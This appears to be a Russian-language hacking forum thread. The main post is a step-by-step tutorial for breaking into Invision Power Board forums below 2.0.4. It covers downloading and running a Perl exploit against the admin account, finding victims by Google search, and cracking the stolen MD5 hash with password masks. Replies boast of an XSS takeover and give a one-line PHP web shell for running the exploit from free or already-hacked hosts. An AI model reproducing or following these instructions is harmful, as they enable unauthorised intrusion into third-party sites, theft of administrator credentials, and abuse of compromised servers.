Взлом форумов IPB (Invision Power Board) < 2.0.4 Делать мы это будем при помощи эксплоита от [..RusH security team..] Итак что нам понадобится: -Голова -Руки. Растущие из правильного (с анатомической точки зрения) места. -Active Perl -Сплоит -MD5 INSIDE (для расшифровки хешей) Итак приступим. 1)Качаем Active Perl Устанавливаем к примеру в c:\perl Создаем папку c:\perl\sploits -Место где будут лежать сплоиты 2)Далее качаем сплоит. Он называется: r57ipb2 Лежит тут: http://rst.void.ru/download/r57ipb2.txt Сохраняем в с:\perl\sploits\ Идем в с:\perl\sploits\ и переименовываем r57ipb2.txt в r57ipb2.pl Правим сплоит.( Там одна ошибка стоит только присмотреться и сразу бросится в глаза.) 3)Ищем жертву. Google в помощь. (Для тех кто в танке: набираем в поле поиска - Powered by Invision Power Board) 4)Идем в командную строку и набираем что-то вроде: perl c:\perl\splots\r57ipb2.pl www.target.com /directory/ 1 X Итак разбираем что я только что написал: [+]perl - Запускаем Active Perl; [+]c:\perl\splots\r57ipb2.pl - пусть к сплоиту; [+]www.target.com - Цель; [+]/dir/ - Директория, где хранится форум.Пример: /forum/ Примечание если форум находится в корневом каталоге, то вводим просто: / Пример: perl c:\perl\splots\r57ipb2.pl www.target.com / 1 X [+]1 - ID пользователя. (1 - ADMIN); [+]X - Вместо Х надо ввести 1 или 0 1 - Если форум версии [2.0.0; 2.0.4) 0 - Eсли форум версии < 2.0.0 ========================================= Итак мы атакуем форум который находится по адресу: www.anyurl.com/forum Версия 1.* Final Команда будет выглядеть так: perl c:\perl\splots\r57ipb2.pl www.anyurl.com /forum/ 1 0 ========================================= Должно получиться что-то вроде этого: ## r57ipb2.pl www.anyurl.com /forum/ 1 0 ## [~] SERVER : www.anyurl.com ## [~] PATH : /forum/ ## [~] MEMBER ID : 1 ## [~] TARGET : 0 - IPB 1.* ## [~] SEARCHING PASSWORD ... [ DONE ] ## ## MEMBER ID : 1 ## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99 ========================================= 5)Мы получили не сам пасс, а его хеш. Теперь из хеша получим пасс. Для этого нам нужна прога MD5INSIDE. Создаем текстовый док. Вставляем в него хеш. Заходим в MD5INSIDE. "Файл" >> "Открыть" находим наш док с хешом. "Поиск". Дальше как повезёт. Я рекомендую искать по маске. Вот самые популярные маски пассов: A - Большая буква. а - маленькая буква. N - цифра S - спец. символ. ааааааа AAAAAAA NNNNNNNNNN Aaaaaaa aaaaN aaaaNN AaaaN AaaaNN AaaaaN AaaaaNN aaaaaN aaaaaNN AAaaaaa aaaaS aaaaaS aaaaaaS AaaaS AaaaaS AaaaaaS ================================ Если пасс не найден следует воспользоваться полным перебором. Но это займёт много времени. Сколько??? (X^Y*3600)/Z где: X - алфавит перебора(кол-во всевозможных символов в пассе) Y - длина пасса Z - скорость перебора(кол-во комбинаций в секунду) Ответ будет получен в часах. ================================ 6)Итак пасс получен.
А я вчера Ipb 2.0.4, Xss рулит просто супер, Админ до сех пор не поймёт как я его ломанул. Хорошо посмотри на ЛЕФЫМ меню тама есть (Редактировать ШАБЛОН в Html).
нихрена нельзя. Я всё там облазил со своего компа ничего загрузить нельзя. Может у меня прав мало или ещё что?
вощето можно и без перла обойтись если качать лень надо наити какой нить хост с поддержкой php и perl (фрихост или взломанный хост) залить туда простейший вэб шел вроде <? passthru("$cmd"); ?> скажем в shell.php ну и сам сплойт на перле напримр под именем ipbexploit.pl. потом запустить это дело с браузера примерно так: http://host.tld/somepoth/shell.php?cmd=perl ipbexploit.pl victim.com /forumpath/ 1 0 и подождать результатов.еще удобнее модифицировать сплойт немного чтобы он все результаты созранял в лог файл. если есть доступ к хосту с перлом по ssh или забинден где-ниить шелл еще проше.